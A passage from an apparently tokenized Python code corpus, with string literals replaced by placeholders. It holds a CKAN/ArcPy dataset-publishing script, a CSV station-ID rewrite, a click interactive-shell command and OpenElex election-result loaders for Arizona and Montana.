fieldnames : <EOL> values . append ( row . getValue ( field ) ) <EOL> try : <EOL> csv_writer . writerow ( values ) <EOL> except : <EOL> error_count += <NUM_LIT:1> <EOL> error_report = '<STR_LIT>' . format ( error_report , values ) <EOL> if logger : <EOL> logger . debug ( '<STR_LIT>' . format ( args . dataset_name , sys . exc_info ( ) [ <NUM_LIT:1> ] , sys . exc_info ( ) [ <NUM_LIT:0> ] , values ) ) <EOL> csv_file . close ( ) <EOL> if error_count > <NUM_LIT:0> : <EOL> sys . exc_clear ( ) <EOL> logger . exception ( '<STR_LIT>' . format ( args . dataset_name , error_report ) ) <EOL> else : <EOL> publish_file ( temp_working_folder , name + '<STR_LIT>' , '<STR_LIT>' ) <EOL> def drop_exclude_fields ( ) : <EOL> """<STR_LIT>""" <EOL> exclude_fields = args . exclude_fields <EOL> if exclude_fields != None : <EOL> logger . info ( '<STR_LIT>' + exclude_fields ) <EOL> exclude_fields = exclude_fields . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:;>' ) <EOL> arcpy . DeleteField_management ( staging_feature_class , exclude_fields ) <EOL> def replace_literal_nulls ( layer_name ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' ) <EOL> fields , row , rows = None , None , None <EOL> try : <EOL> fields = arcpy . ListFields ( layer_name ) <EOL> rows = arcpy . UpdateCursor ( layer_name ) <EOL> for row in rows : <EOL> for field in fields : <EOL> if field . type == '<STR_LIT>' : <EOL> value = row . getValue ( field . name ) <EOL> if ( value != None ) : <EOL> if ( value . find ( '<STR_LIT>' ) > - <NUM_LIT:1> ) : <EOL> logger . debug ( '<STR_LIT>' . format ( field . name ) ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> row . setValue ( field . name , None ) <EOL> logger . debug ( '<STR_LIT>' . format ( value ) ) <EOL> rows . updateRow ( row ) <EOL> logger . debug ( '<STR_LIT>' . format ( layer_name ) ) <EOL> finally : <EOL> if row : <EOL> del row <EOL> if rows : <EOL> del rows <EOL> def get_remote_dataset ( dataset_id ) : <EOL> """<STR_LIT>""" <EOL> dataset_entity = None <EOL> try : <EOL> dataset_entity = ckan_client . package_entity_get ( dataset_id ) <EOL> logger . info ( '<STR_LIT>' + dataset_id + '<STR_LIT>' ) <EOL> except ckanclient . CkanApiNotFoundError : <EOL> logger . info ( '<STR_LIT>' + dataset_id + '<STR_LIT>' ) <EOL> return dataset_entity <EOL> def create_dataset ( dataset_id ) : <EOL> """<STR_LIT>""" <EOL> dataset_entity = create_local_dataset ( dataset_id ) <EOL> dataset_entity = update_dataset_resources ( dataset_entity ) <EOL> if ( args . update_from_metadata != None and '<STR_LIT>' in args . formats ) : <EOL> dataset_entity = update_local_dataset_from_metadata ( dataset_entity ) <EOL> if args . exe_result != '<STR_LIT>' : <EOL> create_remote_dataset ( dataset_entity ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' . format ( args . exe_result ) ) <EOL> def create_local_dataset ( dataset_id ) : <EOL> """<STR_LIT>""" <EOL> global args , ckan_client <EOL> logger . info ( '<STR_LIT>' + dataset_id + '<STR_LIT>' ) <EOL> dataset_entity = { } ; <EOL> dataset_entity [ '<STR_LIT:name>' ] = dataset_id <EOL> dataset_entity [ '<STR_LIT>' ] = args . ckan_license <EOL> dataset_entity [ '<STR_LIT:title>' ] = get_dataset_title ( ) <EOL> try : <EOL> group_entity = ckan_client . group_entity_get ( args . ckan_group_name ) <EOL> if group_entity is not None : <EOL> logger . info ( '<STR_LIT>' + args . ckan_group_name ) <EOL> dataset_entity [ '<STR_LIT>' ] = [ group_entity [ '<STR_LIT:id>' ] ] <EOL> except ckanclient . CkanApiNotFoundError : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name , args . ckan_group_name ) ) <EOL> dataset_entity [ '<STR_LIT>' ] = [ ] <EOL> return dataset_entity <EOL> def create_remote_dataset ( dataset_entity ) : <EOL> """<STR_LIT>""" <EOL> global ckan_client <EOL> ckan_client . package_register_post ( dataset_entity ) <EOL> def update_dataset ( dataset_entity ) : <EOL> """<STR_LIT>""" <EOL> dataset_entity = update_dataset_resources ( dataset_entity ) <EOL> dataset_entity [ '<STR_LIT>' ] = args . ckan_license <EOL> dataset_entity [ '<STR_LIT:title>' ] = get_dataset_title ( ) <EOL> if ( args . update_from_metadata != None and '<STR_LIT>' in args . formats ) : <EOL> dataset_entity = update_local_dataset_from_metadata ( dataset_entity ) <EOL> update_remote_dataset ( dataset_entity ) <EOL> def update_dataset_resources ( dataset_entity ) : <EOL> """<STR_LIT>""" <EOL> global args , ckan_client <EOL> resources = [ ] <EOL> if ( '<STR_LIT>' in dataset_entity ) : <EOL> resources = dataset_entity [ '<STR_LIT>' ] <EOL> dataset_file_name = get_dataset_filename ( ) <EOL> title = args . dataset_title <EOL> if '<STR_LIT>' in args . formats : <EOL> shp_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( shp_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> shp_resource = { } <EOL> resources . append ( shp_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> shp_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> shp_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> shp_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> shp_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> shp_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> shp_resource [ '<STR_LIT>' ] = '<STR_LIT:file>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> shp_resource [ '<STR_LIT:size>' ] = file_size <EOL> if '<STR_LIT>' in args . formats : <EOL> dwg_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( dwg_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> dwg_resource = { } <EOL> resources . append ( dwg_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> dwg_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> dwg_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> dwg_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> dwg_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> dwg_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> dwg_resource [ '<STR_LIT>' ] = '<STR_LIT:file>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> dwg_resource [ '<STR_LIT:size>' ] = file_size <EOL> if '<STR_LIT>' in args . formats : <EOL> kml_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( kml_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> kml_resource = { } <EOL> resources . append ( kml_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> kml_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> kml_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> kml_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> kml_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> kml_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> kml_resource [ '<STR_LIT>' ] = '<STR_LIT:file>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> kml_resource [ '<STR_LIT:size>' ] = file_size <EOL> if '<STR_LIT>' in args . formats : <EOL> csv_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( csv_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> csv_resource = { } <EOL> resources . append ( csv_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> csv_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> csv_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> csv_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> csv_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> csv_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> csv_resource [ '<STR_LIT>' ] = '<STR_LIT:file>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> csv_resource [ '<STR_LIT:size>' ] = file_size <EOL> if '<STR_LIT>' in args . formats : <EOL> metadata_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( metadata_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> metadata_resource = { } <EOL> resources . append ( metadata_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> metadata_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> metadata_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> metadata_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> metadata_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> metadata_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> metadata_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> metadata_resource [ '<STR_LIT:size>' ] = file_size <EOL> if '<STR_LIT>' in args . formats : <EOL> gdb_resource = get_resource_by_format ( resources , '<STR_LIT>' ) <EOL> if ( gdb_resource is None ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> gdb_resource = { } <EOL> resources . append ( gdb_resource ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> gdb_resource [ '<STR_LIT:name>' ] = title + '<STR_LIT>' <EOL> gdb_resource [ '<STR_LIT:description>' ] = title + '<STR_LIT>' <EOL> gdb_resource [ '<STR_LIT:url>' ] = args . download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' <EOL> gdb_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> gdb_resource [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> gdb_resource [ '<STR_LIT>' ] = '<STR_LIT:file>' <EOL> file_size = get_file_size ( output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>' ) <EOL> if file_size : <EOL> gdb_resource [ '<STR_LIT:size>' ] = file_size <EOL> dataset_entity [ '<STR_LIT>' ] = resources ; <EOL> return dataset_entity <EOL> def get_resource_by_format ( resources , format_type ) : <EOL> """<STR_LIT>""" <EOL> for resource in resources : <EOL> current_format = resource [ '<STR_LIT>' ] <EOL> if ( str ( current_format ) . strip ( ) . upper ( ) == format_type . strip ( ) . upper ( ) ) : <EOL> return resource <EOL> return None <EOL> def get_file_size ( file_path ) : <EOL> """<STR_LIT>""" <EOL> file_size = None <EOL> try : <EOL> file_size = os . path . getsize ( file_path ) ; <EOL> except : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name , file_path ) ) <EOL> return file_size <EOL> def slugify_string ( in_str ) : <EOL> """<STR_LIT>""" <EOL> slug = re . sub ( '<STR_LIT>' , '<STR_LIT:->' , in_str ) <EOL> slug = re . sub ( '<STR_LIT>' , '<STR_LIT>' , slug ) . lower ( ) . strip ( '<STR_LIT:->' ) <EOL> slug = re . sub ( '<STR_LIT>' , '<STR_LIT:->' , slug ) <EOL> return slug ; <EOL> def update_local_dataset_from_metadata ( dataset_entity ) : <EOL> """<STR_LIT>""" <EOL> folder = '<STR_LIT>' <EOL> name = get_dataset_filename ( ) <EOL> working_folder = os . path . join ( output_folder , folder ) <EOL> file_path = os . path . join ( working_folder , name + '<STR_LIT>' ) <EOL> metadata_file = open ( file_path , '<STR_LIT:r>' ) <EOL> metadata_xml = et . parse ( metadata_file ) <EOL> metadata_file . close ( ) <EOL> title = get_dataset_title ( ) <EOL> dataset_entity [ '<STR_LIT:title>' ] = title <EOL> xpath_abstract = '<STR_LIT>' <EOL> abstract_element = metadata_xml . find ( xpath_abstract ) <EOL> if ( abstract_element is not None ) : <EOL> dataset_entity [ '<STR_LIT>' ] = abstract_element . text <EOL> else : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> xpath_maintainer = '<STR_LIT>' <EOL> maintainer_element = metadata_xml . find ( xpath_maintainer ) <EOL> if ( maintainer_element != None ) : <EOL> dataset_entity [ '<STR_LIT>' ] = maintainer_element . text <EOL> else : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> xpath_maintainer_email = '<STR_LIT>' <EOL> maintainer_email_element = metadata_xml . find ( xpath_maintainer_email ) <EOL> if ( maintainer_email_element != None ) : <EOL> dataset_entity [ '<STR_LIT>' ] = maintainer_email_element . text <EOL> else : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> xpath_author = '<STR_LIT>' <EOL> author_element = metadata_xml . find ( xpath_author ) <EOL> if ( author_element != None ) : <EOL> dataset_entity [ '<STR_LIT>' ] = author_element . text <EOL> else : <EOL> logger . warn ( '<STR_LIT>' . format ( args . dataset_name ) ) <EOL> dataset_entity [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> keywords = [ ] <EOL> if ( '<STR_LIT>' in dataset_entity ) : <EOL> if ( '<STR_LIT>' in dataset_entity [ '<STR_LIT>' ] ) : <EOL> keywords . append ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' ) ; <EOL> xpath_theme_keys = '<STR_LIT>' <EOL> theme_keyword_elements = metadata_xml . findall ( xpath_theme_keys ) <EOL> xpath_place_keys = '<STR_LIT>' <EOL> place_keyword_elements = metadata_xml . findall ( xpath_place_keys ) <EOL> keyword_elements = theme_keyword_elements + place_keyword_elements <EOL> for keyword_element in keyword_elements : <EOL> keyword = slugify_string ( keyword_element . text ) <EOL> keywords . append ( keyword ) <EOL> logger . debug ( '<STR_LIT>' + keyword ) ; <EOL> keywords . append ( '<STR_LIT>' ) <EOL> dataset_entity [ '<STR_LIT>' ] = keywords <EOL> return dataset_entity <EOL> def update_remote_dataset ( dataset_entity ) : <EOL> """<STR_LIT>""" <EOL> global ckan_client <EOL> logger . info ( '<STR_LIT>' ) ; <EOL> ckan_client . package_entity_put ( dataset_entity ) <EOL> def update_dataset_version ( ) : <EOL> """<STR_LIT>""" <EOL> global args <EOL> logger . info ( '<STR_LIT>' ) <EOL> ckan = ckanclient . CkanClient ( base_location = args . ckan_api , api_key = args . ckan_api_key ) <EOL> dataset_id = args . ckan_dataset_name_prefix + args . dataset_name <EOL> try : <EOL> dataset_entity = ckan . package_entity_get ( dataset_id ) <EOL> version = dataset_entity [ '<STR_LIT:version>' ] <EOL> version = increment_version ( version , args . increment ) <EOL> dataset_entity [ '<STR_LIT:version>' ] = version <EOL> ckan . package_entity_put ( dataset_entity ) <EOL> except ckanclient . CkanApiNotFoundError : <EOL> logger . info ( '<STR_LIT>' + dataset_id + '<STR_LIT>' ) <EOL> def increment_version ( version , increment_type ) : <EOL> """<STR_LIT>""" <EOL> incremented_version = version <EOL> if version == None : <EOL> incremented_version = '<STR_LIT>' <EOL> logger . info ( '<STR_LIT>' + incremented_version ) ; <EOL> else : <EOL> version_parts = version . split ( '<STR_LIT:.>' ) <EOL> if len ( version_parts ) == <NUM_LIT:3> : <EOL> major = int ( version_parts [ <NUM_LIT:0> ] ) <EOL> minor = int ( version_parts [ <NUM_LIT:1> ] ) <EOL> revision = int ( version_parts [ <NUM_LIT:2> ] ) <EOL> if increment_type == '<STR_LIT>' : <EOL> major = major + <NUM_LIT:1> <EOL> elif increment_type == '<STR_LIT>' : <EOL> minor = minor + <NUM_LIT:1> <EOL> elif increment_type == '<STR_LIT>' : <EOL> revision = revision + <NUM_LIT:1> <EOL> incremented_version = str ( major ) + '<STR_LIT:.>' + str ( minor ) + '<STR_LIT:.>' + str ( revision ) <EOL> logger . info ( '<STR_LIT>' + version + '<STR_LIT>' + incremented_version ) ; <EOL> return incremented_version <EOL> def init_logger ( ) : <EOL> """<STR_LIT>""" <EOL> global logger <EOL> logging . config . fileConfig ( '<STR_LIT>' ) <EOL> if ( args . build_target == '<STR_LIT>' ) : <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> else : <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> numeric_level = getattr ( logging , args . log_level . upper ( ) , None ) <EOL> if not isinstance ( numeric_level , int ) : <EOL> raise ValueError ( '<STR_LIT>' % args . log_level ) <EOL> logger . setLevel ( numeric_level ) <EOL> logger . name = '<STR_LIT>' <EOL> consoleHandler = logger . handlers [ <NUM_LIT:0> ] <EOL> logFileName = '<STR_LIT>' + args . dataset_name + '<STR_LIT>' <EOL> fileHandler = logging . FileHandler ( logFileName , ) <EOL> fileHandler . setLevel ( consoleHandler . level ) <EOL> fileHandler . setFormatter ( consoleHandler . formatter ) <EOL> logger . addHandler ( fileHandler ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> f = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> r = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> r . write ( f . readline ( ) ) <EOL> lines = f . readlines ( ) <EOL> for line in lines : <EOL> stationID = line . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] <EOL> newStationID = int ( stationID ) + <NUM_LIT> <EOL> outLine = str ( newStationID ) + line [ len ( stationID ) : ] <EOL> r . write ( outLine ) <EOL> r . close ( ) <EOL> f . close ( ) </s>
<s> import os <EOL> from os . path import dirname , join <EOL> PROJECT_ROOT = dirname ( __file__ ) <EOL> COUNTRY_DIR = join ( PROJECT_ROOT , '<STR_LIT>' ) </s>
<s> import code <EOL> import os <EOL> import click <EOL> @ click . command ( help = "<STR_LIT>" ) <EOL> @ click . option ( '<STR_LIT>' , is_flag = True ) <EOL> def shell ( no_startup = False ) : <EOL> """<STR_LIT>""" <EOL> imported_objects = { } <EOL> try : <EOL> import readline <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> import rlcompleter <EOL> readline . set_completer ( rlcompleter . Completer ( imported_objects ) . complete ) <EOL> readline . parse_and_bind ( "<STR_LIT>" ) <EOL> if not no_startup : <EOL> for pythonrc in ( os . environ . get ( "<STR_LIT>" ) , '<STR_LIT>' ) : <EOL> if not pythonrc : <EOL> continue <EOL> pythonrc = os . path . expanduser ( pythonrc ) <EOL> if not os . path . isfile ( pythonrc ) : <EOL> continue <EOL> try : <EOL> with open ( pythonrc ) as handle : <EOL> exec ( compile ( handle . read ( ) , pythonrc , '<STR_LIT>' ) , imported_objects ) <EOL> except NameError : <EOL> pass <EOL> code . interact ( local = imported_objects ) </s>
<s> import re <EOL> import csv <EOL> import unicodecsv <EOL> from openelex . base . load import BaseLoader <EOL> from openelex . models import RawResult <EOL> from openelex . lib . text import ocd_type_id , slugify <EOL> from . datasource import Datasource <EOL> """<STR_LIT>""" <EOL> class LoadResults ( object ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , mapping ) : <EOL> election_id = mapping [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in election_id : <EOL> loader = AZPrecinctLoader ( ) <EOL> elif '<STR_LIT>' in election_id : <EOL> loader = AZSpecialLoader ( ) <EOL> else : <EOL> loader = AZCountyLoader ( ) <EOL> loader . run ( mapping ) <EOL> class AZBaseLoader ( BaseLoader ) : <EOL> datasource = Datasource ( ) <EOL> target_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def _skip_row ( self , row ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class AZPrecinctLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> contest_winner = row [ '<STR_LIT>' ] . strip ( ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> county_ocd_id = [ c for c in self . datasource . _jurisdictions ( ) if c [ '<STR_LIT>' ] . upper ( ) == row [ '<STR_LIT>' ] . upper ( ) ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( county_ocd_id , ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } <EOL> class AZCountyLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( self . mapping [ '<STR_LIT>' ] , <EOL> ocd_type_id ( row [ '<STR_LIT>' ] . strip ( ) ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } <EOL> class AZSpecialLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( self . mapping [ '<STR_LIT>' ] , <EOL> ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } </s>
<s> import re <EOL> import csv <EOL> import unicodecsv <EOL> from openelex . base . load import BaseLoader <EOL> from openelex . models import RawResult <EOL> from openelex . lib . text import ocd_type_id , slugify <EOL> from . datasource import Datasource <EOL> """<STR_LIT>""" <EOL> class LoadResults ( object ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , mapping ) : <EOL> election_id = mapping [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in election_id : <EOL> loader = MTPrecinctLoader ( ) <EOL> else : <EOL> loader = MTCountyLoader ( ) <EOL> loader . run ( mapping ) <EOL> class MTBaseLoader ( BaseLoader ) : <EOL> datasource = Datasource ( ) <EOL> target_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def _skip_row ( self , row ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class MTPrecinctLoader ( MTBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( 